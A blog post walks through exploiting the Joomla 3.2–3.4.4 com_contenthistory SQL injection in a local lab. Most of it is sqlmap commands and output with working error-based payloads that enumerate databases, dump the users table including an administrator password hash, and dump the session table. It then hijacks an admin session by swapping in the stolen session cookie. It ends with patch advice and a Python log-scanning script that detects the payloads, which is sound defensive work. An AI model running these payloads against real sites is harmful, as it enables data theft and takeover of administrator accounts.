25 October 2015, Alberto

Joomla SQL Injection from version 3.2 to 3.4.4

Joomla SQL Injection

Joomla is one of the most popular content management systems for building websites; it is currently estimated that 2.8 million sites are built on it. The vulnerabilities found in these systems usually affect third-party extensions, which limits the attack surface to the sites that use them. Occasionally, however, the vulnerability sits in the core of the CMS, as in this case, which has left 6.6% of all websites running a content management system (Joomla's current market share) exposed to an attack that grants administrator-level access.

The vulnerability, published two days ago and already patched, is a SQL injection tracked as CVE-2015-7297, CVE-2015-7857 and CVE-2015-7858, affecting versions from 3.2 up to the current latest release, 3.4.4. It lies in a SQL query in the file /administrator/components/com_contenthistory/models/history.php. The Trustwave blog gives a very good technical write-up of how they pieced the clues together until they found the vulnerability.

For my part, I set up a small lab with a vulnerable Joomla, in this case version 3.2, to check how it can be exploited.

I tested the injection directly with sqlmap:

sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E --dbs

sqlmap finds the injection point and enumerates the databases:

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL  --technique=E --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . |       | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:47:40

[19:47:40] [INFO] loading tamper script 'apostrophemask'
[19:47:40] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[19:47:40] [INFO] testing connection to the target URL
[19:47:40] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[19:47:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:47:40] [INFO] testing MySQL
[19:47:40] [INFO] confirming MySQL
[19:47:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:47:40] [INFO] fetching database names
[19:47:40] [INFO] the SQL query used returns 4 entries
[19:47:40] [INFO] starting 4 threads
[19:47:40] [INFO] resumed: JoomlaLab
[19:47:40] [INFO] resumed: mysql
[19:47:40] [INFO] resumed: performance_schema
[19:47:40] [INFO] resumed: information_schema
available databases [4]:
[*] information_schema
[*] JoomlaLab
[*] mysql
[*] performance_schema

[19:47:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 19:47:40

Next we can enumerate the tables in the database:

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D JoomlaLab --tables
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . |       | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:52:28

[19:52:28] [INFO] loading tamper script 'apostrophemask'
[19:52:28] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[19:52:28] [INFO] testing connection to the target URL
[19:52:28] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[19:52:28] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:52:28] [INFO] testing MySQL
[19:52:28] [INFO] confirming MySQL
[19:52:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'
[19:52:28] [WARNING] reflective value(s) found and filtering out
[19:52:28] [INFO] the SQL query used returns 68 entries
[19:52:28] [INFO] starting 10 threads
[19:52:29] [INFO] retrieved: q9741_banner_tracks
[19:52:29] [INFO] retrieved: q9741_assets
[19:52:29] [INFO] retrieved: q9741_categories
[19:52:29] [INFO] retrieved: q9741_banner_clients
[19:52:29] [INFO] retrieved: q9741_associations
[19:52:29] [INFO] retrieved: q9741_banners
[19:52:29] [INFO] retrieved: q9741_contact_details
[19:52:29] [INFO] retrieved: q9741_content_frontpage
[19:52:29] [INFO] retrieved: q9741_content
[19:52:29] [INFO] retrieved: q9741_content_rating
[19:52:29] [INFO] retrieved: q9741_content_types
[19:52:29] [INFO] retrieved: q9741_core_log_searches
[19:52:29] [INFO] retrieved: q9741_contentitem_tag_map
[19:52:29] [INFO] retrieved: q9741_finder_links
[19:52:29] [INFO] retrieved: q9741_extensions
[19:52:29] [INFO] retrieved: q9741_finder_links_terms1
[19:52:29] [INFO] retrieved: q9741_finder_links_terms0
[19:52:29] [INFO] retrieved: q9741_finder_links_terms2
[19:52:29] [INFO] retrieved: q9741_finder_filters
[19:52:29] [INFO] retrieved: q9741_finder_links_terms5
[19:52:29] [INFO] retrieved: q9741_finder_links_terms4
[19:52:29] [INFO] retrieved: q9741_finder_links_terms3
[19:52:29] [INFO] retrieved: q9741_finder_links_terms7
[19:52:29] [INFO] retrieved: q9741_finder_links_terms9
[19:52:29] [INFO] retrieved: q9741_finder_links_terms8
[19:52:29] [INFO] retrieved: q9741_finder_links_termsb
[19:52:29] [INFO] retrieved: q9741_finder_links_terms6
[19:52:29] [INFO] retrieved: q9741_finder_links_termsa
[19:52:29] [INFO] retrieved: q9741_finder_links_termsc
[19:52:30] [INFO] retrieved: q9741_finder_links_termse
[19:52:30] [INFO] retrieved: q9741_finder_links_termsd
[19:52:30] [INFO] retrieved: q9741_finder_terms
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy
[19:52:30] [INFO] retrieved: q9741_finder_tokens
[19:52:30] [INFO] retrieved: q9741_finder_tokens_aggregate
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy_map
[19:52:30] [INFO] retrieved: q9741_finder_links_termsf
[19:52:30] [INFO] retrieved: q9741_finder_terms_common
[19:52:30] [INFO] retrieved: q9741_modules_menu
[19:52:30] [INFO] retrieved: q9741_menu
[19:52:30] [INFO] retrieved: q9741_menu_types
[19:52:30] [INFO] retrieved: q9741_messages_cfg
[19:52:30] [INFO] retrieved: q9741_messages
[19:52:30] [INFO] retrieved: q9741_languages
[19:52:30] [INFO] retrieved: q9741_finder_types
[19:52:30] [INFO] retrieved: q9741_modules
[19:52:30] [INFO] retrieved: q9741_newsfeeds
[19:52:30] [INFO] retrieved: q9741_tags
[19:52:30] [INFO] retrieved: q9741_postinstall_messages
[19:52:30] [INFO] retrieved: q9741_overrider
[19:52:30] [INFO] retrieved: q9741_session
[19:52:30] [INFO] retrieved: q9741_redirect_links
[19:52:30] [INFO] retrieved: q9741_template_styles
[19:52:30] [INFO] retrieved: q9741_schemas
[19:52:30] [INFO] retrieved: q9741_ucm_base
[19:52:30] [INFO] retrieved: q9741_updates
[19:52:30] [INFO] retrieved: q9741_ucm_content
[19:52:30] [INFO] retrieved: q9741_update_sites_extensions
[19:52:30] [INFO] retrieved: q9741_user_notes
[19:52:30] [INFO] retrieved: q9741_update_sites
[19:52:30] [INFO] retrieved: q9741_ucm_history
[19:52:30] [INFO] retrieved: q9741_user_usergroup_map
[19:52:30] [INFO] retrieved: q9741_user_keys
[19:52:30] [INFO] retrieved: q9741_viewlevels
[19:52:30] [INFO] retrieved: q9741_usergroups
[19:52:30] [INFO] retrieved: q9741_user_profiles
[19:52:30] [INFO] retrieved: q9741_users
[19:52:30] [INFO] retrieved: q9741_weblinks
Database: JoomlaLab
[68 tables]
+-------------------------------+
| q9741_assets                  |
| q9741_associations            |
| q9741_banner_clients          |
| q9741_banner_tracks           |
| q9741_banners                 |
| q9741_categories              |
| q9741_contact_details         |
| q9741_content                 |
| q9741_content_frontpage       |
| q9741_content_rating          |
| q9741_content_types           |
| q9741_contentitem_tag_map     |
| q9741_core_log_searches       |
| q9741_extensions              |
| q9741_finder_filters          |
| q9741_finder_links            |
| q9741_finder_links_terms0     |
| q9741_finder_links_terms1     |
| q9741_finder_links_terms2     |
| q9741_finder_links_terms3     |
| q9741_finder_links_terms4     |
| q9741_finder_links_terms5     |
| q9741_finder_links_terms6     |
| q9741_finder_links_terms7     |
| q9741_finder_links_terms8     |
| q9741_finder_links_terms9     |
| q9741_finder_links_termsa     |
| q9741_finder_links_termsb     |
| q9741_finder_links_termsc     |
| q9741_finder_links_termsd     |
| q9741_finder_links_termse     |
| q9741_finder_links_termsf     |
| q9741_finder_taxonomy         |
| q9741_finder_taxonomy_map     |
| q9741_finder_terms            |
| q9741_finder_terms_common     |
| q9741_finder_tokens           |
| q9741_finder_tokens_aggregate |
| q9741_finder_types            |
| q9741_languages               |
| q9741_menu                    |
| q9741_menu_types              |
| q9741_messages                |
| q9741_messages_cfg            |
| q9741_modules                 |
| q9741_modules_menu            |
| q9741_newsfeeds               |
| q9741_overrider               |
| q9741_postinstall_messages    |
| q9741_redirect_links          |
| q9741_schemas                 |
| q9741_session                 |
| q9741_tags                    |
| q9741_template_styles         |
| q9741_ucm_base                |
| q9741_ucm_content             |
| q9741_ucm_history             |
| q9741_update_sites            |
| q9741_update_sites_extensions |
| q9741_updates                 |
| q9741_user_keys               |
| q9741_user_notes              |
| q9741_user_profiles           |
| q9741_user_usergroup_map      |
| q9741_usergroups              |
| q9741_users                   |
| q9741_viewlevels              |
| q9741_weblinks                |
+-------------------------------+

[19:52:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
[19:52:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 19:52:30

root@KaliVB:~#

From here one can take the classic route and dump the users table to crack the password hash:

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T q9741_users --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . |       | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:00:11

[21:00:11] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:00:11] [INFO] testing connection to the target URL
[21:00:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[21:00:11] [INFO] testing MySQL
[21:00:11] [INFO] confirming MySQL
[21:00:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'
[21:00:11] [WARNING] reflective value(s) found and filtering out
[21:00:11] [INFO] the SQL query used returns 15 entries
[21:00:11] [INFO] starting 10 threads
[21:00:11] [INFO] retrieved: id
[21:00:11] [INFO] retrieved: name
[21:00:11] [INFO] retrieved: registerDate
[21:00:11] [INFO] retrieved: password
[21:00:11] [INFO] retrieved: email
[21:00:11] [INFO] retrieved: block
[21:00:11] [INFO] retrieved: sendEmail
[21:00:11] [INFO] retrieved: username
[21:00:11] [INFO] retrieved: activation
[21:00:11] [INFO] retrieved: lastvisitDate
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: varchar(255)
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: datetime
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: int(11)
[21:00:11] [INFO] retrieved: datetime
[21:00:11] [INFO] retrieved: varchar(150)
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: params
[21:00:11] [INFO] retrieved: resetCount
[21:00:11] [INFO] retrieved: otep
[21:00:11] [INFO] retrieved: lastResetTime
[21:00:11] [INFO] retrieved: otpKey
[21:00:11] [INFO] retrieved: text
[21:00:12] [INFO] retrieved: varchar(1000)
[21:00:12] [INFO] retrieved: int(11)
[21:00:12] [INFO] retrieved: datetime
[21:00:12] [INFO] retrieved: varchar(1000)
[21:00:12] [INFO] fetching entries for table 'q9741_users' in database 'JoomlaLab'
[21:00:12] [INFO] the SQL query used returns 1 entries
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: correo@gmail.com
[21:00:12] [INFO] retrieved: 601
[21:00:12] [INFO] retrieved: 0000-00-00 00:00:00
[21:00:12] [INFO] retrieved: 2015-10-24 16:16:32
[21:00:12] [INFO] retrieved: Super User
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved: $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y
[21:00:12] [INFO] retrieved: 2015-10-24 16:11:53
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: 1
[21:00:12] [INFO] retrieved: alberto
[21:00:12] [INFO] analyzing table dump for possible password hashes
Database: JoomlaLab
Table: q9741_users
[1 entry]
+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+
| id  | name       | otep    | email                           | block | otpKey  | params  | username | password                                                     | sendEmail | activation | resetCount | registerDate        | lastResetTime       | lastvisitDate       |
+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+
| 601 | Super User | <blank> | correo@gmail.com                | 0     | <blank> | <blank> | alberto  | $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y | 1         | 0          | 0          | 2015-10-24 16:11:53 | 0000-00-00 00:00:00 | 2015-10-24 16:16:32 |
+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+

[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'
[21:00:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[21:00:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 21:00:12

But taking it one step further, what Trustwave do to skip the tedious process of cracking the password is to query the *_session table and take the administrator's authentication token in order to hijack the session.

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T q9741_session --dump --stop 1
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . |       | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:20:15

[21:20:15] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:20:15] [INFO] testing connection to the target URL
[21:20:15] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[21:20:15] [INFO] testing MySQL
[21:20:15] [INFO] confirming MySQL
[21:20:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[21:20:15] [INFO] fetching columns for table 'q9741_session' in database 'JoomlaLab'
[21:20:15] [INFO] the SQL query used returns 7 entries
[21:20:15] [INFO] starting 7 threads
[21:20:15] [INFO] resumed: session_id
[21:20:15] [INFO] resumed: varchar(200)
[21:20:15] [INFO] resumed: client_id
[21:20:15] [INFO] resumed: tinyint(3) unsigned
[21:20:15] [INFO] resumed: guest
[21:20:15] [INFO] resumed: tinyint(4) unsigned
[21:20:15] [INFO] resumed: time
[21:20:15] [INFO] resumed: data
[21:20:15] [INFO] resumed: varchar(14)
[21:20:15] [INFO] resumed: mediumtext
[21:20:15] [INFO] resumed: userid
[21:20:15] [INFO] resumed: int(11)
[21:20:15] [INFO] resumed: username
[21:20:15] [INFO] resumed: varchar(150)
[21:20:15] [INFO] fetching entries for table 'q9741_session' in database 'JoomlaLab'
[21:20:15] [INFO] resumed: 1445712986
[21:20:15] [INFO] resumed: 0
[21:20:15] [INFO] resumed: __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1445712986;s:18:"session.timer.last";i:1445712986;s:17:"session.timer.now";i:1445712986;s:22:"session.client.browser";s:50:"sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)";s:8:"registry";O:9:"JRegistry":1:{s:7:"\\\\0\\\\0\\\\0data";O:8:"stdClass":1:{s:18:"com_contenthistory";O:8:"stdClass":1:{s:7:"history";O:8:"stdClass":1:{s:4:"list";a:2:{s:8:"ordering";s:0:"";s:6:"select";s:0:"";}}}}}s:4:"user";O:5:"JUser":24:{s:9:"\\\\0\\\\0\\\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:2:"13";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:10:"\\\\0\\\\0\\\\0_params";O:9:"JRegistry":1:{s:7:"\\\\0\\\\0\\\\0data";O:8:"stdClass":0:{}}s:14:"\\\\0\\\\0\\\\0_authGroups";N;s:14:"\\\\0\\\\0\\\\0_authLevels";a:2:{i:0;i:1;i:1;i:1;}s:15:"\\\\0\\\\0\\\\0_authActions";N;s:12:"\\\\0\\\\0\\\\0_errorMsg";N;s:10:"\\\\0\\\\0\\\\0_errors";a:0:{}s:3:"aid";i:0;}}
[21:20:15] [INFO] resumed: 1
[21:20:15] [INFO] resumed: 001sn75fhrcri90rvlrgdrpg35
[21:20:15] [INFO] resumed: 0
[21:20:15] [INFO] resumed:
[21:20:15] [INFO] analyzing table dump for possible password hashes
Database: JoomlaLab
Table: q9741_session
[1 entry]
+--------+-----------+----------------------------+--------------------+-------+------------+----------+
| userid | client_id | session_id                 | data               | guest | time       | username |
+--------+-----------+----------------------------+--------------------+-------+------------+----------+
| 0      | 0         | 001sn75fhrcri90rvlrgdrpg35 | __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1445712986;s:18:"session.timer.last";i:1445712986;s:17:"session.timer.now";i:1445712986;s:22:"session.client.browser";s:50:"sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)";s:8:"registry";O:9:"JRegistry":1:{s:7:"\\0\\0\\0data";O:8:"stdClass":1:{s:18:"com_contenthistory";O:8:"stdClass":1:{s:7:"history";O:8:"stdClass":1:{s:4:"list";a:2:{s:8:"ordering";s:0:"";s:6:"select";s:0:"";}}}}}s:4:"user";O:5:"JUser":24:{s:9:"\\0\\0\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:2:"13";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:10:"\\0\\0\\0_params";O:9:"JRegistry":1:{s:7:"\\0\\0\\0data";O:8:"stdClass":0:{}}s:14:"\\0\\0\\0_authGroups";N;s:14:"\\0\\0\\0_authLevels";a:2:{i:0;i:1;i:1;i:1;}s:15:"\\0\\0\\0_authActions";N;s:12:"\\0\\0\\0_errorMsg";N;s:10:"\\0\\0\\0_errors";a:0:{}s:3:"aid";i:0;}} | 1     | 1445712986 | <blank>  |
+--------+-----------+----------------------------+--------------------+-------+------------+----------+

[21:20:15] [INFO] table 'JoomlaLab.q9741_session' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_session.csv'
[21:20:15] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[21:20:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 21:20:15

root@KaliVB:~#

Once the token is obtained, you only need to refresh the browser.

Refresh the browser

Modify the cookie with the session_id value

Manipulate the cookie with the session id

And we are in.

Session hijacking

It is clear how simple this vulnerability is to exploit. The recommendation is to update as soon as possible to the latest version, which fixes this vulnerability, and to wait for November, when the revamped 3.5 release is due.
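As a detection counterpart to the runs above, here is an added example (not code from the post, Joomla, Trustwave or sqlmap) that scans Apache access-log lines for requests to com_contenthistory whose list[select] or list[ordering] values carry SQL syntax, and records the HTTP 500s and sqlmap user agent the lab runs left behind. The log lines embedded at the bottom are constructed to resemble those requests.

```python
"""Flag exploitation attempts against the com_contenthistory SQL injection
(CVE-2015-7297 / CVE-2015-7857 / CVE-2015-7858) in Apache access logs.

Added example for this post; it is not Joomla, Trustwave or sqlmap code. The
log lines at the bottom are constructed to resemble the requests sqlmap sent
in the lab, not copied from any real server.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# history.php in Joomla 3.2-3.4.4 built its query from these list parameters
# without validating them, which is where the payloads in the post land.
SUSPECT_PARAMS = ("list[select]", "list[ordering]")

# Fragments that a legitimate column or ordering list never contains but the
# error-based payloads in the post do (quotes, parentheses, SELECT, CONCAT,
# INFORMATION_SCHEMA, FLOOR(RAND(0)*2) ...).
SQL_MARKERS = re.compile(
    r"""['"()]|\b(select|union|concat|information_schema|floor|rand|sleep|benchmark)\b""",
    re.IGNORECASE,
)

# Apache "combined" log format: ip - - [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return None for requests that are not aimed at com_contenthistory,
    otherwise a dict with an 'alert' flag and the evidence behind it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs URL-decodes keys and values, so list%5Bselect%5D and
    # list[select] both end up under the same key.
    query = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    if query.get("option", [""])[0] != "com_contenthistory":
        return None
    evidence = []
    for param in SUSPECT_PARAMS:
        for value in query.get(param, []):
            # Decode once more so a double-encoded payload is still inspected.
            if SQL_MARKERS.search(unquote_plus(value)):
                evidence.append(f"SQL syntax in {param}: {value[:40]!r}")
    alert = bool(evidence)
    # Supporting signals only: sqlmap's default User-Agent, and the HTTP 500s
    # the post's runs produced ("500 (Internal Server Error) - 72 times").
    if "sqlmap" in m.group("ua").lower():
        evidence.append("sqlmap user agent")
    if m.group("status") == "500":
        evidence.append("HTTP 500 from the history view")
    return {"ip": m.group("ip"), "time": m.group("time"),
            "alert": alert, "evidence": evidence}


def scan(lines):
    """Return the classification of every request that raised an alert."""
    return [r for r in map(classify, lines) if r and r["alert"]]


# Constructed sample log lines (not taken from the post's lab).
SAMPLE_LOG = [
    '127.0.0.1 - - [24/Oct/2015:19:47:40 +0200] "GET /Joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [24/Oct/2015:19:47:40 +0200] "GET /Joomla/index.php?option=com_contenthistory&view=history&item_id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [24/Oct/2015:19:47:40 +0200] "GET /Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=%27%20AND%20(SELECT%205490%20FROM(SELECT%20COUNT(*),CONCAT(0x716b6b6b71,(SELECT%20(ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1337 "-" "sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)"',
    '10.0.0.5 - - [24/Oct/2015:21:00:11 +0200] "GET /Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list%5Bordering%5D=(SELECT%209327%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS) HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["time"], "; ".join(hit["evidence"]))
```

The last sample line shows why the User-Agent and the 500 count are only supporting evidence: a probe sent with a browser User-Agent through list[ordering] that returns 200 is still flagged on the SQL syntax alone.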
